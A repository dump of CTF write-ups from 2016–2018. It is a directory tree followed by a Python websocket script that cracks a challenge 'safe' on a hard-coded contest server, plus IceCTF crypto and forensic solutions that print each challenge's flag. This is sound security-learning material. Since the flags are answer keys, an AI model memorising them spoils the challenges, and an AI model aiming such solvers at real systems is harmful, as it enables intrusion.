├── 2016 ├── 3DS2016 │ ├── pwn │ │ └── please-no │ │ │ ├── README.md │ │ │ ├── README.md~ │ │ │ ├── payleaseshell.py │ │ │ ├── payplease.py │ │ │ ├── payplease.py~ │ │ │ ├── payputshell.py │ │ │ ├── paysheelbf.py │ │ │ └── please-no │ └── web │ │ └── safe_cracking_in_a_websockets_house │ │ ├── README.md │ │ └── breakThatSafe.py ├── IceCTF2016 │ ├── crypto │ │ ├── alien-message │ │ │ ├── alien_message_b84f283848b7f34fd4c7529186e66e120b0a374c9d0f2a225b0a7a215716afb5.png │ │ │ ├── futurama.gif │ │ │ └── readme.md │ │ ├── over-the-hill │ │ │ ├── hill.py │ │ │ └── readme.md │ │ ├── rotated │ │ │ └── readme.md │ │ ├── rsa1 │ │ │ └── README.md │ │ ├── rsa2 │ │ │ └── README.md │ │ ├── rsa? │ │ │ └── README.md │ │ └── subsituted │ │ │ └── README.md │ ├── forensic │ │ ├── BlueMonday │ │ │ └── README.md │ │ ├── audio-problems │ │ │ ├── flag_audio_problems.png │ │ │ └── readme.md │ │ ├── corrupt-transmission │ │ │ └── README.md │ │ ├── intercepted-conversations-pt1 │ │ │ ├── README.md │ │ │ └── kinesis.png │ │ └── time-traveler │ │ │ └── readme.md │ ├── misc │ │ ├── matrix │ │ │ ├── QRCode-2-Structure.jpg │ │ │ ├── README.md │ │ │ ├── matrix.png │ │ │ └── matrix2.png │ │ ├── scavenger_hunt │ │ │ ├── crawl.py │ │ │ └── readme.md │ │ └── search │ │ │ └── readme.md │ ├── pwn │ │ ├── DearDiary │ │ │ └── readme.md │ │ ├── Demo │ │ │ └── README.md │ │ └── Ropi │ │ │ ├── #Gh.c# │ │ │ ├── Gh.c │ │ │ ├── Gh.hop │ │ │ ├── NC │ │ │ ├── flag.txt │ │ │ ├── p.py │ │ │ ├── payload │ │ │ ├── pile.py │ │ │ ├── pile2.py │ │ │ ├── pile3.py │ │ │ ├── readme.md │ │ │ ├── ropi │ │ │ ├── solution.zip │ │ │ └── source.c │ ├── recon │ │ └── complacent │ │ │ └── readme.md │ ├── stegano │ │ └── vape-nation │ │ │ ├── flag_vape.png │ │ │ └── readme.md │ └── web │ │ ├── chainedIN │ │ ├── readme.md │ │ └── sploit.py │ │ ├── exposed │ │ └── README.md │ │ ├── flag-storage │ │ └── readme.md │ │ ├── geoip │ │ └── README.md │ │ ├── kitty │ │ └── README.md │ │ ├── miners │ │ └── README.md │ │ ├── move-along │ │ ├── flag_move_along.jpg │ │ └── readme.md │ │ └── spotlight │ │ └── readme.md ├── csaw2016 │ ├── forensic │ │ ├── clams_dont_dance │ │ │ ├── image0.gif │ │ │ └── readme.md │ │ └── kill │ │ │ └── readme.md │ ├── misc │ │ ├── coinslot │ │ │ ├── coinslot.py │ │ │ └── readme.md │ │ └── regexpire │ │ │ ├── readme.md │ │ │ └── regexpire.py │ ├── pwn │ │ ├── Hungman │ │ │ ├── dumpjeu.help │ │ │ ├── exemple.jeu │ │ │ ├── hungman │ │ │ ├── hungman.gdb │ │ │ ├── hungman.i64 │ │ │ ├── hungman.txt │ │ │ ├── hungman_all.c │ │ │ ├── hungman_ida.c │ │ │ ├── jeu-0.py │ │ │ ├── jeu-2.py │ │ │ ├── jeu-final.py │ │ │ ├── jeu-final.py~ │ │ │ ├── jeu.bin │ │ │ ├── lance │ │ │ ├── libc-2.23.so │ │ │ └── readme.md │ │ └── Tutorial │ │ │ ├── NC2 │ │ │ ├── NC2.tgz │ │ │ ├── NC2l │ │ │ ├── exploit-0.py │ │ │ ├── exploit-0.py~ │ │ │ ├── libc-2.19.so │ │ │ ├── readme.md │ │ │ ├── tuto.canari │ │ │ ├── tutorial │ │ │ ├── tutorial.c │ │ │ ├── tutorial.i64 │ │ │ ├── tutorial.solution │ │ │ ├── tutorial2 │ │ │ ├── tutorial_ida.c │ │ │ ├── what │ │ │ ├── writeup.py │ │ │ └── writeup.py~ │ └── web │ │ └── mfw │ │ ├── index.php │ │ ├── readme.md │ │ └── templates │ │ ├── about.php │ │ ├── contact.php │ │ ├── flag.php │ │ └── home.php ├── hackit2016 │ ├── crypto │ │ └── senegal-evil-corp │ │ │ ├── orig.txt │ │ │ ├── output.txt │ │ │ ├── readme.md │ │ │ └── script.sh │ ├── network │ │ └── australia-voice-of-the-future │ │ │ ├── bf_cipher.sh │ │ │ ├── e06.ogg │ │ │ ├── fil-aes-256-cbc.dec │ │ │ ├── key.enc │ │ │ └── readme.md │ ├── ppc │ │ ├── belarus │ │ │ ├── flag.jpg │ │ │ ├── o2.txt │ │ │ ├── o3.txt │ │ │ ├── orig.txt │ │ │ ├── out.txt │ │ │ ├── pain.txt │ │ │ ├── read_hex.py │ │ │ ├── read_out.py │ │ │ ├── read_pain.py │ │ │ └── readme.md │ │ └── mongolie │ │ │ ├── mongolie.py │ │ │ └── readme.md │ ├── reverse │ │ └── malaysia │ │ │ ├── PhParanoid_3x3cut10nl0g.dmp │ │ │ ├── PhParanoid_b7fa460590b3dc2a7662dc0bb633a7d8.phb │ │ │ ├── decalage.py │ │ │ ├── dump.orig │ │ │ ├── dump.txt │ │ │ ├── new.py │ │ │ ├── new2.py │ │ │ ├── new3.py │ │ │ ├── new4.py │ │ │ ├── output_new4.py │ │ │ ├── parser.py │ │ │ ├── readme.md │ │ │ ├── to_parse │ │ │ └── to_parse2 │ ├── stego │ │ ├── azerbaijan-suspicious-avi │ │ │ ├── compared_00057406.png │ │ │ ├── h4ck1t_pepapig.py │ │ │ ├── readme.md │ │ │ ├── vidz-orig.png │ │ │ └── vidz.png │ │ └── mozambique-1magePr1son │ │ │ ├── getflag.py │ │ │ ├── outgrid.png │ │ │ ├── planet.png │ │ │ └── readme.md │ └── web │ │ ├── northkorea │ │ ├── parse_parenthesis.py │ │ └── readme.md │ │ └── russia │ │ ├── generate_qrcode.py │ │ ├── out.png │ │ └── readme.md ├── hackthevote2016 │ └── pwn │ │ └── irs │ │ └── README.md └── qiwictf │ └── Crypto_300_2 │ ├── #writeup.py# │ ├── session.python │ ├── writeup.lyx │ └── writeup.pdf ├── 2017 ├── SECCON │ └── binary │ │ └── powerfull_shell │ │ ├── README.md │ │ ├── exploit.py │ │ └── powerful_shell.ps1-1fb3af91eafdbebf3b3efa3b84fcc10cfca21ab53db15c98797b500c739b0024 ├── Sect-CTF │ ├── pwn │ │ └── Gibson │ │ │ └── readme.md │ └── web │ │ ├── DarkMarket │ │ └── README.md │ │ └── NaughtyAds │ │ ├── README.md │ │ └── sploit.py ├── csaw2017 │ ├── misc │ │ ├── Misc100 │ │ │ ├── README.md │ │ │ └── luhn.py │ │ └── Misc50 │ │ │ ├── README.md │ │ │ └── payload.py │ └── pwn │ │ ├── auir │ │ ├── README.md │ │ ├── README.md.org │ │ ├── auir │ │ ├── auir.c │ │ ├── auir.loc │ │ └── payload.py │ │ ├── pilot │ │ ├── README.md │ │ ├── payload.py │ │ └── pilot │ │ └── scv │ │ ├── README.md │ │ ├── payload.py │ │ └── scv ├── easyctf │ ├── crypto │ │ ├── rsa_1 │ │ │ └── readme.md │ │ ├── rsa_2 │ │ │ └── readme.md │ │ └── rsa_3 │ │ │ └── readme.md │ ├── forensic │ │ ├── Mane_Event │ │ │ ├── img │ │ │ │ └── 588785dd3d2d4e8366c4b0802da7f2425fd7e3fe_lion.jpg │ │ │ └── readme.md │ │ └── My_USB │ │ │ ├── img │ │ │ └── 00002494.jpg │ │ │ └── readme.md │ └── web │ │ ├── edge-1 │ │ ├── img │ │ │ └── edge-1.png │ │ └── readme.md │ │ └── edge-2 │ │ ├── img │ │ └── edge-1.png │ │ └── readme.md ├── fit-hack │ ├── crypto │ │ ├── big_number │ │ │ ├── readme.md │ │ │ └── src │ │ │ │ ├── fer │ │ │ │ ├── message │ │ │ │ └── public-key.pem │ │ │ │ └── seru │ │ │ │ ├── message │ │ │ │ └── public-key.pem │ │ ├── encryption_program_leaked │ │ │ ├── readme.md │ │ │ └── src │ │ │ │ └── Cryptographic_program.py │ │ └── service_encrypt │ │ │ └── readme.md │ ├── forensic │ │ └── connect │ │ │ ├── img │ │ │ ├── 00000006.png │ │ │ ├── 00000076.png │ │ │ ├── 00000126.png │ │ │ ├── flag.png │ │ │ └── output.png │ │ │ └── readme.md │ ├── misc │ │ └── color │ │ │ ├── apng │ │ │ ├── apngframe01.png │ │ │ ├── apngframe02.png │ │ │ ├── apngframe03.png │ │ │ ├── apngframe04.png │ │ │ ├── apngframe05.png │ │ │ ├── apngframe06.png │ │ │ ├── apngframe07.png │ │ │ ├── apngframe08.png │ │ │ ├── apngframe09.png │ │ │ ├── apngframe10.png │ │ │ ├── apngframe11.png │ │ │ ├── apngframe12.png │ │ │ ├── apngframe13.png │ │ │ ├── apngframe14.png │ │ │ ├── apngframe15.png │ │ │ ├── apngframe16.png │ │ │ ├── apngframe17.png │ │ │ └── apngframe18.png │ │ │ ├── img │ │ │ └── image.png │ │ │ └── readme.md │ └── web │ │ └── let-s-login │ │ ├── img │ │ ├── bypass.png │ │ ├── login.png │ │ └── sqli.png │ │ └── readme.md ├── hackIT │ ├── pwn150 │ │ ├── README.md │ │ └── pwn150 │ └── pwn200 │ │ ├── README.md │ │ └── pwn200 ├── inshack │ └── crypto │ │ └── readme.md ├── ndh_wargame │ └── crypto │ │ ├── merkle │ │ ├── img │ │ │ ├── arrays.png │ │ │ ├── index.png │ │ │ └── paquet.png │ │ ├── readme.md │ │ └── src │ │ │ ├── merkle.pcap │ │ │ └── merkle.py │ │ └── unlucky │ │ ├── img │ │ ├── bad_signature.png │ │ ├── bmh.png │ │ └── good_signature.png │ │ ├── readme.md │ │ └── src │ │ └── unlucky.txt ├── neverlan │ ├── forensic │ │ ├── not_star_trek │ │ │ ├── img │ │ │ │ ├── 00003840.png │ │ │ │ └── testdisk.png │ │ │ └── readme.md │ │ └── siths_use_ubuntu │ │ │ ├── img │ │ │ ├── authlog.png │ │ │ ├── figure1.png │ │ │ ├── process.png │ │ │ ├── ps.png │ │ │ └── shadow.png │ │ │ └── readme.md │ └── web │ │ └── no_humans_Allowed │ │ ├── readme.md │ │ └── robots.py ├── picoCTF │ ├── Crypto │ │ └── masterl4 │ │ │ └── resolution.py │ └── Pwn │ │ ├── l3chat │ │ ├── chat.html │ │ ├── payloadchat.py │ │ └── readme.md │ │ ├── l3console │ │ ├── payload.py │ │ └── readme.md │ │ ├── l3matrix │ │ ├── payloadmatrix.py │ │ ├── pwnfloat.c │ │ └── readme.md │ │ ├── l4flag │ │ ├── payload.py │ │ └── readme.md │ │ ├── readme.md │ │ └── readme.md~ ├── sthack │ ├── misc │ │ └── something_strange │ │ │ └── readme.md │ └── web │ │ └── Mr_president │ │ └── readme.md ├── thcon │ ├── crypto │ │ ├── OTPunched │ │ │ ├── img │ │ │ │ ├── card1.png │ │ │ │ └── card2.png │ │ │ └── readme.md │ │ └── brokenhash │ │ │ ├── file │ │ │ ├── a.pdf │ │ │ ├── b.pdf │ │ │ ├── shattered-1.pdf │ │ │ └── shattered-2.pdf │ │ │ ├── img │ │ │ ├── right.jpg │ │ │ └── top.jpg │ │ │ └── readme.md │ └── web │ │ └── Multipass │ │ ├── img │ │ ├── flag.png │ │ └── web.png │ │ └── readme.md ├── tuctf │ ├── crypto │ │ └── crypto50.py │ ├── pwn │ │ ├── guestbox │ │ │ └── payload.py │ │ ├── vuln-chat │ │ │ └── payload-final.py │ │ └── vuln-chat2 │ │ │ └── payload-final.py │ └── web │ │ └── web200 │ │ ├── solution │ │ └── test.sh ├── xiomara │ ├── misc │ │ └── xiomara_misc_200_shopkeeper_quiz.py │ └── pwn │ │ ├── README.md │ │ ├── mint │ │ └── payload.py │ │ ├── secure_pyshell │ │ ├── pwn2.py │ │ └── readme.md │ │ └── xortool │ │ └── payformat.py └── yubitsec │ ├── crypto │ ├── diffie_hellman │ │ ├── img │ │ │ └── crypto.jpg │ │ └── readme.md │ ├── easy │ │ ├── readme.md │ │ └── src │ │ │ └── secret.txt │ ├── rsa │ │ ├── readme.md │ │ └── src │ │ │ └── RSA │ │ │ ├── Part1 │ │ │ ├── PublicKey1.pem │ │ │ └── ciphertext1 │ │ │ ├── Part2 │ │ │ ├── PublicKey2.pem │ │ │ └── ciphertext2 │ │ │ └── Part3 │ │ │ ├── PublicKey3.pem │ │ │ └── ciphertext3 │ ├── rsa2 │ │ ├── readme.md │ │ └── src │ │ │ ├── PublicKey.pem │ │ │ └── ciphertext │ └── simple_encryption │ │ ├── readme.md │ │ └── src │ │ ├── encrypted │ │ └── simple_enc.py │ ├── stegano │ ├── blushes │ │ ├── img │ │ │ ├── indir.png │ │ │ └── solved.bmp │ │ └── readme.md │ ├── falkreath │ │ ├── img │ │ │ └── ciceros.jpg │ │ └── readme.md │ └── text_into_image │ │ ├── img │ │ └── lsb.png │ │ └── readme.md │ ├── warmup │ └── bash │ │ └── readme.md │ └── web │ └── webshell │ ├── img │ └── shell_as_service.png │ └── readme.md ├── 2018 ├── Inshack │ ├── Forensic │ │ └── Worm-in-apple │ │ │ ├── README.md │ │ │ └── source │ │ │ └── DoxyDoxygen.sublime-package │ └── Web │ │ └── Crimemail │ │ ├── README.md │ │ └── img │ │ ├── accueil.png │ │ ├── detect.png │ │ └── sqli.png ├── NoNameCon │ └── web │ │ └── Bank │ │ └── README.md ├── Sharif │ ├── Forensic │ │ └── Hidden │ │ │ └── readme.md │ ├── Pwn250-t00p_secrets │ │ ├── README.md │ │ ├── payload.py │ │ ├── payload.py~ │ │ └── t00p_secrets │ ├── Pwn75-leak_puts │ │ ├── README.md │ │ ├── exploit.py │ │ ├── libc.so.6 │ │ └── vuln4 │ └── Web │ │ ├── Hidden-Input │ │ ├── img │ │ │ ├── burp.png │ │ │ ├── login.png │ │ │ └── sql.png │ │ └── readme.md │ │ └── The-News-Hacker │ │ ├── img │ │ ├── admin.png │ │ ├── burp.png │ │ └── wordpress.png │ │ └── readme.md ├── Thcon │ ├── Network │ │ └── 50 │ │ │ ├── readme.md │ │ │ └── sources │ │ │ └── dump.pcap │ ├── Reverse │ │ ├── 200-android │ │ │ ├── THC.apk │ │ │ ├── readme.md │ │ │ └── solver.py │ │ └── 250-call_less_reverse │ │ │ ├── img │ │ │ ├── cls-function-a761.png │ │ │ ├── cls-function-a7c.png │ │ │ ├── cls-function-modif-stack.png │ │ │ ├── cls-function-sub-874.png │ │ │ ├── cls-functions.png │ │ │ ├── cls-main-decomp.png │ │ │ ├── cls-positive-sp.png │ │ │ ├── cls-stack-761.png │ │ │ ├── cls-stack-761.svg │ │ │ └── cls-verify-hardcoded-flag.png │ │ │ ├── readme.md │ │ │ └── solver.py │ └── Web │ │ ├── 200 │ │ ├── readme.md │ │ └── sources │ │ │ └── sources.zip │ │ └── 300 │ │ ├── img │ │ └── flag.png │ │ └── readme.md ├── Timisoara │ ├── Pwn │ │ ├── Attendance │ │ │ ├── README.md │ │ │ ├── attendance │ │ │ ├── attendance.c │ │ │ └── payload.py │ │ ├── Cdparty │ │ │ ├── README.md │ │ │ ├── c_party │ │ │ ├── c_party.c │ │ │ ├── c_party.zip │ │ │ └── payload.py │ │ ├── HeapSchool │ │ │ ├── README.md │ │ │ ├── heaphop │ │ │ └── payload.py │ │ ├── Letssort │ │ │ ├── README.md │ │ │ ├── letssort │ │ │ ├── letssort.c │ │ │ ├── libc.so.6 │ │ │ ├── payload.py │ │ │ └── session │ │ ├── Memo │ │ │ ├── README.md │ │ │ ├── m.c │ │ │ ├── memo │ │ │ ├── memo.c │ │ │ ├── memo.exe │ │ │ ├── memo.zip │ │ │ ├── payload.py │ │ │ ├── pile │ │ │ └── pilelocaleSansASLR │ │ ├── Pwnescu │ │ │ ├── README.md │ │ │ ├── payload.py │ │ │ ├── pwnescu │ │ │ ├── pwnescu.c │ │ │ ├── rand │ │ │ ├── rand.c │ │ │ └── session │ │ └── README.md │ ├── forensic │ │ └── neurosurgery │ │ │ ├── files │ │ │ ├── Ubuntu1604_4.4.0-116.zip │ │ │ └── ht0p │ │ │ └── readme.md │ └── web │ │ ├── BookDir_1_and_2 │ │ └── README.md │ │ └── porcupiney │ │ └── README.md ├── angstrom │ ├── README.md │ ├── crypto │ │ ├── ofb │ │ │ └── readme.md │ │ └── ssh │ │ │ ├── files │ │ │ ├── angryssh.sage │ │ │ ├── id_rsa │ │ │ ├── id_rsa.pub │ │ │ └── privkey.pem │ │ │ └── readme.md │ ├── misc │ │ ├── paste_palooza │ │ │ ├── README.md │ │ │ └── src │ │ │ │ └── pastepalooza │ │ │ │ └── redacted │ │ │ │ ├── config │ │ │ │ └── config.exs │ │ │ │ ├── lib │ │ │ │ ├── pastepalooza.ex │ │ │ │ ├── server.ex │ │ │ │ └── utility.ex │ │ │ │ ├── mix.exs │ │ │ │ └── pastes │ │ │ │ └── paste.txt │ │ └── slots │ │ │ ├── README.md │ │ │ └── src │ │ │ └── slots.py │ └── web │ │ ├── madlibs │ │ ├── README.md │ │ ├── img │ │ │ ├── screen1.png │ │ │ ├── screen2.png │ │ │ ├── screen3.png │ │ │ └── screen4.png │ │ └── src │ │ │ └── app.py │ │ └── md5 │ │ ├── readme.md │ │ └── web-md5-screen.png ├── bsides │ └── forensic │ │ ├── fuzzy │ │ ├── files │ │ │ ├── fuzzy_dns_filter01.png │ │ │ ├── fuzzy_dns_filter02.png │ │ │ ├── fuzzy_dns_filter03.png │ │ │ ├── hex_png.log │ │ │ ├── img.png │ │ │ ├── message.gpg │ │ │ └── private.gpg │ │ └── readme.md │ │ └── never │ │ └── readme.md └── codegate │ └── reverse │ └── RedVelvet │ ├── README.md │ ├── RedVelvet │ └── exploit.py └── README.md /2016/3DS2016/pwn/please-no/please-no: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2016/3DS2016/pwn/please-no/please-no -------------------------------------------------------------------------------- /2016/3DS2016/web/safe_cracking_in_a_websockets_house/breakThatSafe.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import asyncio 4 | import websockets 5 | import time 6 | 7 | async def hello(): 8 | async with websockets.connect('ws://192.241.176.246:8888/box') as websocket: 9 | name = "aaaa" 10 | await websocket.send(name) 11 | greeting = await websocket.recv() 12 | splitted = greeting.split("|") 13 | char1 = chr(int(splitted[0])+97) 14 | char2 = chr(int(splitted[1])+97) 15 | char3 = chr(int(splitted[2])+97) 16 | char4 = chr(int(splitted[3])+97) 17 | half = char1+char2+char3+char4 18 | await websocket.send(half+"aaaa") 19 | greeting = await websocket.recv() 20 | splitted = greeting.split("|") 21 | char5 = chr(int(splitted[4])+97) 22 | char6 = chr(int(splitted[5])+97) 23 | char7 = chr(int(splitted[6])+97) 24 | char8 = chr(int(splitted[7])+97) 25 | otherhalf = char5+char6+char7+char8 26 | print("half+otherhalf") 27 | await websocket.send(half+otherhalf) 28 | greeting = await websocket.recv() 29 | print("< {}".format(greeting)) 30 | 31 | asyncio.get_event_loop().run_until_complete(hello()) 32 | 33 | -------------------------------------------------------------------------------- /2016/IceCTF2016/crypto/alien-message/alien_message_b84f283848b7f34fd4c7529186e66e120b0a374c9d0f2a225b0a7a215716afb5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2016/IceCTF2016/crypto/alien-message/alien_message_b84f283848b7f34fd4c7529186e66e120b0a374c9d0f2a225b0a7a215716afb5.png -------------------------------------------------------------------------------- /2016/IceCTF2016/crypto/alien-message/futurama.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2016/IceCTF2016/crypto/alien-message/futurama.gif -------------------------------------------------------------------------------- /2016/IceCTF2016/crypto/alien-message/readme.md: -------------------------------------------------------------------------------- 1 | # Alien Message (Cryptography · 40 pt) 2 | 3 | We got an image with strange alien symbols 4 | 5 | ![Alt](alien_message_b84f283848b7f34fd4c7529186e66e120b0a374c9d0f2a225b0a7a215716afb5.png "Alien Message") 6 | 7 | Let’s use an alien alphabet to decode it, I used the following one http://www.omniglot.com/images/writing/futurama.gif 8 | 9 | ![Alt](futurama.gif "Futurama alphabet") 10 | 11 | Symbols are differents for upercase and lowercase Flag is : 12 | 13 | The flag is : IceCTF{gOOd_n3wZ_3veryon3_1_l1k3_fu7ur4ma_4nd_th3ir_4maz1ng_3as7er_39g5} 14 | -------------------------------------------------------------------------------- /2016/IceCTF2016/crypto/rotated/readme.md: -------------------------------------------------------------------------------- 1 | # Rotated!(Cryptography · 20 pt) 2 | 3 | Following challenge title, ROT13, so I used a decoder online as http://www.dcode.fr/rot-13-cipher 4 | 5 | VprPGS{jnvg_bar_cyhf_1_vf_3?} 6 | 7 | The flag is : IceCTF{wait_one_plus_1_is_3?} 8 | -------------------------------------------------------------------------------- /2016/IceCTF2016/crypto/rsa?/README.md: -------------------------------------------------------------------------------- 1 | # RSA? (crypto · 50 pt) 2 | 3 | John was messing with RSA again... he encrypted our flag! I have a strong feeling he had no idea what he was doing however, can you get the flag for us? 4 | 5 | ``` 6 | N=0x180be86dc898a3c3a710e52b31de460f8f350610bf63e6b2203c08fddad44601d96eb454a34dab7684589bc32b19eb27cffff8c07179e349ddb62898ae896f8c681796052ae1598bd41f35491175c9b60ae2260d0d4ebac05b4b6f2677a7609c2fe6194fe7b63841cec632e3a2f55d0cb09df08eacea34394ad473577dea5131552b0b30efac31c59087bfe603d2b13bed7d14967bfd489157aa01b14b4e1bd08d9b92ec0c319aeb8fedd535c56770aac95247d116d59cae2f99c3b51f43093fd39c10f93830c1ece75ee37e5fcdc5b174052eccadcadeda2f1b3a4a87184041d5c1a6a0b2eeaa3c3a1227bc27e130e67ac397b375ffe7c873e9b1c649812edcd 7 | 8 | e=0x1 9 | 10 | c=0x4963654354467b66616c6c735f61706172745f736f5f656173696c795f616e645f7265617373656d626c65645f736f5f63727564656c797d 11 | ``` 12 | 13 | C = cypher hexa format 14 | 15 | e = exponent hexa format. 16 | 17 | 18 | But look a the exponent value ?! 1 ! OMG! so there isn't any encryption :) 19 | 20 | 21 | a simple conversion hexa to ascii of the cypher text : 22 | 23 | 24 | http://www.rapidtables.com/convert/number/hex-to-ascii.htm 25 | 26 | 27 | IceCTF{falls_apart_so_easily_and_reassembled_so_crudely} 28 | 29 | eilco 30 | -------------------------------------------------------------------------------- /2016/IceCTF2016/crypto/subsituted/README.md: -------------------------------------------------------------------------------- 1 | # substituted (crypto · 30 pt) 2 | 3 | We got a substitute flag, I hear they are pretty lax on the rules… 4 | 5 | ̀``` 6 | Lw! 7 | 8 | Gyzvecy ke WvyVKT! 9 | 10 | W'zz by reso dsbdkwksky tzjq teo kly ujr. Teo keujr, gy joy dksurwmq bjdwv vorakeqojalr jmu wkd jaazwvjkwemd. 11 | Vorakeqojalr ljd j zemq lwdkeor, jzklesql gwkl kly juxymk et vecaskyod wk ljd qekkym oyjzzr vecazwvjkyu. 12 | Decy dwcazy ezu vwalyod joy kly Vjydjo vwalyo, kly Xwqymyoy vwalyo, kly dsbdkwkskwem vwalyo, glwvl wd klwd emy, jmu de em. 13 | Jzcedk jzz et klydy vwalyod joy yjdwzr boeiym keujr gwkl kly lyza et vecaskyod. 14 | Decy myg ymvorakwem cykleud joy JYD, kly vsooymk dkjmujou teo ymvorakwem, jzemq gwkl ODJ. 15 | Vorakeqojalr wd j xjdk twyzu jmu wd xyor wmkyoydkwmq klesql. 16 | De iwvi bjvi, oyju sa em decy veez vwalyod jmu ljxy tsm! 17 | 18 | El jmu teo reso oyveoud cr mjcy wd WvyVKT{jzgjrd_zwdkym_ke_reso_dsbdkwksky_tzjqd}. 19 | ``` 20 | 21 | I tried to find a know substutituion method but it failed, so I determined following thing : 22 | 23 | ̀``` 24 | WvyVKT = IceCTF 25 | ``` 26 | 27 | From this, I gather that Gyzvecy was “Welcome”, then by hand i found flag IceCTF{always_listen_to_your_substitute_flags} 28 | 29 | By eilco 30 | -------------------------------------------------------------------------------- /2016/IceCTF2016/forensic/audio-problems/flag_audio_problems.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2016/IceCTF2016/forensic/audio-problems/flag_audio_problems.png -------------------------------------------------------------------------------- /2016/IceCTF2016/forensic/audio-problems/readme.md: -------------------------------------------------------------------------------- 1 | # Audio Problems (Forensics · 50 pt) 2 | 3 | I check first the file : 4 | 5 | ```bash 6 | file audio_problems_210b88f2232e1c9d770bb5d2069c47aabb86301b0adc7ad606956394a00f298b.wav 7 | audio_problems_210b88f2232e1c9d770bb5d2069c47aabb86301b0adc7ad606956394a00f298b.wav: RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 44100 Hz 8 | ``` 9 | 10 | Open your audio file with tool Sonic Visualizer => Layer => Add spectrogramm => All Channels mixed 11 | 12 | The flag is written on spectrogramm (Look that !!! Logo: ![Alt](flag_audio_problems.png "Flag Audio Problems")) 13 | 14 | The flag is : IceCTF{y0U_b3t7Er_l15TeN_cL053lY} 15 | -------------------------------------------------------------------------------- /2016/IceCTF2016/forensic/corrupt-transmission/README.md: -------------------------------------------------------------------------------- 1 | # corrupt transmission (forensic · 50 pt) 2 | 3 | We intercepted this image, but it must have gotten corrupted during the transmission. Can you try and fix it? 4 | 5 | the .PNG file seems to be corrupt 6 | 7 | With PNGCHECK : 8 | 9 | ``` 10 | root@kali:~/Bureau# pngcheck -v corrupt_92cee405924ad39fb513e3ef910699b79bb6d45cc5046c051eb9aab3546e22c3.png 11 | File: corrupt_92cee405924ad39fb513e3ef910699b79bb6d45cc5046c051eb9aab3546e22c3.png (469363 bytes) 12 | File is CORRUPTED. It seems to have suffered EOL conversion. 13 | It was probably transmitted in text mode. 14 | ``` 15 | 16 | 17 | The header of the PNG file has been modified in his first 8 octets has we can see with : 18 | ``` 19 | root@kali:~/Bureau# xxd -l8 corrupt_92cee405924ad39fb513e3ef910699b79bb6d45cc5046c051eb9aab3546e22c3.png 20 | 0000000: 9050 4e47 0e1a 0a1b 21 | ``` 22 | 23 | 24 | A png normal header is : 89 50 4E 47 0D 0A 1A 0A. 25 | 26 | If we correct the header, the picture show us the flag :) 27 | 28 | 29 | eilco 30 | 31 | 32 | 33 | -------------------------------------------------------------------------------- /2016/IceCTF2016/forensic/intercepted-conversations-pt1/README.md: -------------------------------------------------------------------------------- 1 | # Intercepted Conversations Pt.1 (forensic · 110 pt) 2 | 3 | This traffic was picked up by one of our agents. We think this might be a conversation between two elite hackers that we are investigating. 4 | Can you see if you can analyze the data? intercept.pcapng 5 | 6 | Wireshark show us a USB traffic between two devices 7 | 8 | The first part of the wireshark capture indicate us an exchange between 2 devices, and the second part show an USB device sending URB_interrupt (maybe the flag) 9 | 10 | ``` 11 | trame 64 > interessant hint ! : ID product : Kinesis Integrated 12 | trame 72 > Kinesis integrated keyboard 13 | ``` 14 | 15 | the flag seems to be a keyboard key text 16 | 17 | there is 4 basic USB transfer mode : control, interrupt, isochronous, bulk 18 | 19 | http://www.beyondlogic.org/usbnutshell/usb4.shtml#Interrupt 20 | 21 | I saw a lot of communication between 3.21.1 and the host 22 | 72 bytes in one hand 23 | 64 bytes in other hand 24 | 25 | 8 bytes de data! it match with the "INterrupt mode" 26 | 27 | "the maximum data payload size for low-speed devices is 8 bytes" 28 | 29 | I used this filter in wireshark : 30 | ``` 31 | ((usb.transfer_type == 0x01) && (frame.len == 72)) 32 | ``` 33 | 34 | 35 | for each line : "leftover capture data" = 8 bytes of data 36 | 37 | I'm looking if it's possible to match an hexa value of this 8 bytes of data, and a keyboard key. 38 | 39 | 40 | I found a documentation who spoke about that : 41 | ``` 42 | root@kali:~# wget http://www.usb.org/developers/hidpage/Hut1_12v2.pdf 43 | (page 53) 44 | ``` 45 | 46 | for each line I deduct the flag : gidiky{,j0-p1v3;-x,3o7t-4lt,4t5} 47 | 48 | obviously it's not the good one : ) 49 | 50 | So I'm looking on the maker of the kinesis integrated keyboard, if there is some specificities with the KINESIS KEYBOARD 51 | 52 | On this document : 53 | 54 | http://www.kinesis-ergo.com/wp-content/uploads/2015/01/kinesis_advantage_user_manual.pdf 55 | (page 39) 56 | 57 | ![Alt](kinesis.png "kinesis keyboard") 58 | 59 | great ! 60 | 61 | iceCTF{wh0_l1k3s_qw3r7y_4nyw4y5} 62 | 63 | eilco 64 | 65 | 66 | -------------------------------------------------------------------------------- /2016/IceCTF2016/forensic/intercepted-conversations-pt1/kinesis.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2016/IceCTF2016/forensic/intercepted-conversations-pt1/kinesis.png -------------------------------------------------------------------------------- /2016/IceCTF2016/forensic/time-traveler/readme.md: -------------------------------------------------------------------------------- 1 | # Time Traveler (Forensics · 45 pt) 2 | 3 | ‘Time Traveler’ let me think to use archive.org whit address to check : http://time-traveler.icec.tf/ 4 | 5 | We got 01 June 2016 and we can read the flag on the page 6 | 7 | The flag is : IceCTF{Th3y'11_n3v4r_f1||d_m4h_fl3g_1n_th3_p45t} 8 | -------------------------------------------------------------------------------- /2016/IceCTF2016/misc/matrix/QRCode-2-Structure.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2016/IceCTF2016/misc/matrix/QRCode-2-Structure.jpg -------------------------------------------------------------------------------- /2016/IceCTF2016/misc/matrix/matrix.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2016/IceCTF2016/misc/matrix/matrix.png 